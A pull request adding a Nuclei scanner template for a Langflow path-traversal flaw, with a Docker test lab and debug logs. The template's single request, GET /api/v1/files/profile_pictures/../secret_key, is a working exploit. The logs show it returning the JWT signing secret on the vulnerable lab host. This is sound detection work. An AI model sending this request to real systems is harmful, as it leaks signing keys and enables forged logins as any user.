### PR TITLE
Add CVE-2026-33497 Langflow Unauthenticated Path Traversal

### DIFF
--- a/http/cves/2026/CVE-2026-33497.yaml
+++ b/http/cves/2026/CVE-2026-33497.yaml
@@ -1,0 +1,36 @@
+id: CVE-2026-33497
+
+info:
+  name: Langflow < 1.7.0 - Unauthenticated Path Traversal leads to secret_key Disclosure
+  author: xtr0nix
+  severity: high
+  description: |
+    Langflow versions up to 1.7.0 are vulnerable to path traversal in the download_profile_picture handler (GET /api/v1/files/profile_pictures/{folder_name}/{file_name}). The folder_name and file_name parameters are concatenated into the file path without sanitization, and the containment check relies on a flawed startswith() comparison. An unauthenticated attacker can use a ".." sequence to traverse out of the profile_pictures directory and read the application's secret_key file, which is used to sign JWT authentication tokens.
+  impact: |
+    Disclosure of the JWT signing secret_key allows an unauthenticated attacker to forge valid authentication tokens and impersonate any user, including administrators, resulting in a full authentication bypass.
+  remediation: |
+    Upgrade to Langflow 1.7.0 or later. The patched version validates the folder_name and file_name parameters against traversal characters at the input layer and verifies the resolved path with Path.is_relative_to().
+  reference:
+    - https://github.com/langflow-ai/langflow/security/advisories/GHSA-ph9w-r52h-28p7
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2026-33497
+    cwe-id: CWE-22
+  metadata:
+    verified: true
+    max-request: 1
+  tags: cve,cve2026,langflow,lfi,path-traversal,unauth
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/api/v1/files/profile_pictures/../secret_key"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - status_code == 200
+          - contains(content_type, 'application/octet-stream')
+          - len(body) == 43
+        condition: and

--- a/http/cves/2026/CVE-2026-33497.yaml
+++ b/http/cves/2026/CVE-2026-33497.yaml
@@ -22,7 +22,7 @@ info:
     verified: true
     max-request: 1
     shodan-query: html:"Langflow"
-  tags: cve,cve2026,langflow,path-traversal,unauth
+  tags: cve,cve2026,langflow,traversal
 
 http:
   - method: GET
@@ -32,7 +32,7 @@ http:
     matchers:
       - type: dsl
         dsl:
+          - len(body) == 43
           - status_code == 200
           - contains(content_type, 'application/octet-stream')
-          - len(body) == 43
         condition: and

--- a/http/cves/2026/CVE-2026-33497.yaml
+++ b/http/cves/2026/CVE-2026-33497.yaml
@@ -1,17 +1,18 @@
 id: CVE-2026-33497
 
 info:
-  name: Langflow < 1.7.0 - Unauthenticated Path Traversal leads to secret_key Disclosure
+  name: Langflow < 1.7.0 - Path Traversal
   author: xtr0nix
   severity: high
   description: |
-    Langflow versions up to 1.7.0 are vulnerable to path traversal in the download_profile_picture handler (GET /api/v1/files/profile_pictures/{folder_name}/{file_name}). The folder_name and file_name parameters are concatenated into the file path without sanitization, and the containment check relies on a flawed startswith() comparison. An unauthenticated attacker can use a ".." sequence to traverse out of the profile_pictures directory and read the application's secret_key file, which is used to sign JWT authentication tokens.
+    Langflow < 1.7.1 contains a path traversal caused by insufficient filtering of folder_name and file_name parameters in download_profile_picture endpoint, letting attackers read secret_key across directories, exploit requires crafted request.
   impact: |
-    Disclosure of the JWT signing secret_key allows an unauthenticated attacker to forge valid authentication tokens and impersonate any user, including administrators, resulting in a full authentication bypass.
+    Attackers can read sensitive secret_key files across directories, potentially compromising system security.
   remediation: |
-    Upgrade to Langflow 1.7.0 or later. The patched version validates the folder_name and file_name parameters against traversal characters at the input layer and verifies the resolved path with Path.is_relative_to().
+    Update to version 1.7.1 or later.
   reference:
     - https://github.com/langflow-ai/langflow/security/advisories/GHSA-ph9w-r52h-28p7
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-33497
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
@@ -20,7 +21,8 @@ info:
   metadata:
     verified: true
     max-request: 1
-  tags: cve,cve2026,langflow,lfi,path-traversal,unauth
+    shodan-query: html:"Langflow"
+  tags: cve,cve2026,langflow,path-traversal,unauth
 
 http:
   - method: GET


### PR DESCRIPTION
## PR Information

* Added [CVE-2026-33497](https://github.com/langflow-ai/langflow/security/advisories/GHSA-ph9w-r52h-28p7): Langflow < 1.7.1 - Unauthenticated Path Traversal leads to secret_key Disclosure
* References:
   * https://nvd.nist.gov/vuln/detail/CVE-2026-33497
   * [GHSA-ph9w-r52h-28p7](https://github.com/langflow-ai/langflow/security/advisories/GHSA-ph9w-r52h-28p7)
   * https://github.com/langflow-ai/langflow/pull/12263

## Template validation

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [x] Validated with a host running a patched version and/or configuration (avoid False Positive)

## Additional Details

> **Note on affected versions:** the GitHub advisory (GHSA-ph9w-r52h-28p7)
> lists affected versions as `<= 1.3.2`. The version range stated in the
> template's description was based on the NVD entry instead, since testing
> confirmed 1.6.9 is also affected (see True Positive below). The template
> itself does not depend on version and detects the vulnerability directly
> by exploiting the traversal.

**Docker lab:**
```yml
version: '3.8'

services:
  langflow-vulnerable:
    image: langflowai/langflow:1.6.9
    container_name: langflow-vulnerable
    restart: always
    ports:
      - 8080:7860

  langflow-patched:
    image: langflowai/langflow:1.7.1
    container_name: langflow-patched
    restart: always
    ports:
      - 8081:7860
```

**Debug data**

```
nuclei -t CVE-2026-33497.yaml -target http://localhost:8080 -duc -debug -v

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.7.1

		projectdiscovery.io

[VER] Started metrics server at localhost:9092
[VER] Saved 23 templates to metadata cache
[INF] Current nuclei version: v3.7.1 (unknown) - remove '-duc' flag to enable update checks
[INF] Current nuclei-templates version:  (unknown) - remove '-duc' flag to enable update checks
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 0
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [CVE-2026-33497] Dumped HTTP request for http://localhost:8080/api/v1/files/profile_pictures/../secret_key

GET /api/v1/files/profile_pictures/../secret_key HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

[VER] [CVE-2026-33497] Sent HTTP request to http://localhost:8080/api/v1/files/profile_pictures/../secret_key
[DBG] [CVE-2026-33497] Dumped HTTP response http://localhost:8080/api/v1/files/profile_pictures/../secret_key

HTTP/1.1 200 OK
Connection: close
Transfer-Encoding: chunked
Content-Type: application/octet-stream
Date: Mon, 13 Jul 2026 20:15:57 GMT
Server: uvicorn

gKR11D-2VVC_TD_vkD23QG8o1VsidSt5wJwZZ_2eOuw
[CVE-2026-33497:dsl-1] [http] [high] http://localhost:8080/api/v1/files/profile_pictures/../secret_key
[INF] Scan completed in 9.646246ms. 1 matches found.



nuclei -t CVE-2026-33497.yaml -target http://localhost:8081 -duc -debug -v

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.7.1

		projectdiscovery.io

[VER] Started metrics server at localhost:9092
[VER] Saved 23 templates to metadata cache
[INF] Current nuclei version: v3.7.1 (unknown) - remove '-duc' flag to enable update checks
[INF] Current nuclei-templates version:  (unknown) - remove '-duc' flag to enable update checks
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 0
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [CVE-2026-33497] Dumped HTTP request for http://localhost:8081/api/v1/files/profile_pictures/../secret_key

GET /api/v1/files/profile_pictures/../secret_key HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

[VER] [CVE-2026-33497] Sent HTTP request to http://localhost:8081/api/v1/files/profile_pictures/../secret_key
[DBG] [CVE-2026-33497] Dumped HTTP response http://localhost:8081/api/v1/files/profile_pictures/../secret_key

HTTP/1.1 400 Bad Request
Connection: close
Content-Length: 83
Content-Type: application/json
Date: Mon, 13 Jul 2026 20:43:19 GMT
Server: uvicorn

{"detail":"Path traversal patterns ('..') are not allowed in folder or file names"}
[INF] Scan completed in 8.120568ms. No results found.
```